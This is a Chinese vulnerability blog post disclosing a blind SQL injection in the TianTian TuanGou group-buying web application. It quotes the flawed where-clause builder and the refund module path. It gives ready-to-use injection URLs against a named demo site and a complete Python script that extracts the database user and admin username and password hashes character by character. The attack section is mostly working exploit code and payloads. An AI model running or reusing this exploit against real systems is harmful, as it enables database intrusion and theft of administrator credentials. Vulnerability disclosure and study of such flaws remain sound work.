天天团购最新版本Blind SQL Injection

  • A+
所属分类:漏洞时代
摘要

include/driver/database/mysql_max.php(308):
//pack_where函数负责组装sql查询语句where条件部分

include/driver/database/mysql_max.php(308):
//pack_where函数负责组装sql查询语句where条件部分

private function pack_where($dbo)      {      if ( ! $dbo->_where ) return '';      $sql_where = ' wHERe ';      $sql_where_add = '';      foreach ( $dbo->_where as $where )      {          if ( is_array($where) )          {          foreach ( $where as $key => $val )          {              $kvs = '';              if ( is_numeric($val) )              {              $kvs = '`'.$key.'`' . '=' . $val;              }              elseif ( is_string($val) )              {              $kvs = '`'.$key.'`' . '="' . $val . '"';              }              elseif ( is_array($val) )              {              $kvs = '`'.$key.'`' . ' ' . $val[0] . ' ' . $val[1];                //如果是数组,$val(值)就直接附在 $key(键名)后面              }              elseif ( is_null($val) )              {              $kvs = '`'.$key.'`' . '=NULL';              }              elseif( is_bool($val) || empty($val) )              {              $kvs = '`'.$key.'`' . '="' . $val . '"';              }              $kvs && $sql_where_add .= $kvs.' aNd ';           }          }          elseif ( is_string($where) )          {                            $where && $sql_where_add .= $where.' aNd ';          }      }      if ( ! $sql_where_add ) return '';      return substr($sql_where.$sql_where_add, 0, - 5);      } 

如果可以传入数组,并进入where条件,经过pack_where组装成语句后,就能形成sql注射了。
找到一处可以传入数组的地方:
/modules/refund.mod.php:

function Main()      {      $order_id= get('oid','number');      $appcode= get('appcode'); //$_GET['appcode']      $token= get('token');   //$_GET['token']      if($appcode && $token){              $uid = logic('refund')->getuid($appcode, $token); //跟进getuid函数          $tempfile = 'apply_3g';          $from = '3g';      }else{          $uid = MEMBER_ID;          $tempfile = 'apply';          $from = 'web';      }      ...

/include/logic/refund.logic.php:

public function getuid($appcode, $token)      {      $session = dbc(DBCMax)->select('api_session')->where(array('appcode' => $appcode, 'token' => $token))->limit(1)->done();//$appcode、$token都进入了where函数,最终将交由pack_where函数解析组装成sql语句,这里appcode和token两个参数都可以由GET方式以数组形式传进      return $session ? $session['user_id'] : 0;      }

没有回显位,只能盲注。

http://tg.tttuangou.net/?mod=refund&appcode=xxoo&token[]=%3d-1%20union%20select%201,1,1,1,1,1 //返回页面:订单信息错误!

http://tg.tttuangou.net/?mod=refund&appcode=xxoo&token[]=%3d-1%20union%20select%201,1,1,0,1,1 //返回页面:请先登录!

通过判断返回页面的内容来进行盲注,这样比时间延时注入要快些。从网上找了个盲注脚本:

#coding=utf-8  import sys,urllib2  from optparse import OptionParser  from urllib2 import Request,urlopen,URLError,HTTPError  import urllib  result=''    def request(URL):      user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }      #print URL      req = urllib2.Request(URL, None, user_agent)                try:          request = urllib2.urlopen(req)                except HTTPError, e:          print('[!] The server couldnt fulfill the request.')          print('[!] Error code: ' + str(e.code))          sys.exit(1)                except URLError, e:          print('[!] We failed to reach a server.')          print('[!] Reason: ' + str(e.reason))          sys.exit(1)                return request.read()    #utf8版本站点: utf8.tttuangou.net  #gbk版本站点: tg.tttuangou.net    def binary_sqli(left, right, index):     global result     while 1:          mid = (left + right)/2          if mid == left:              result += chr(mid)              print result              break          payload = '=-1 union select 1,1,1,if(ascii(substring((select user()),%s,1))<%s,1,0),1,1#' % (str(index), mid)          param = {'token[]': payload}          html = request('http://tg.tttuangou.net/?mod=refund&appcode=xxoo&'+urllib.urlencode(param))           verify1 = r'''订单信息错误!'''.decode("utf-8").encode("gbk") #gbk版本          verify2 = r'''订单信息错误!''' #utf8版本          if verify1 in html or verify2 in html:              right = mid          else:              left = mid                       if __name__ == '__main__':      for i in range(1,50):          binary_sqli(35, 127, i)

tg.tttuangou.net: select user()
天天团购最新版本Blind SQL Injection
utf8.tttuangou.net: select concat(username,0x3a,password) from cenwor_system_members limit 0,1
天天团购最新版本Blind SQL Injection

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: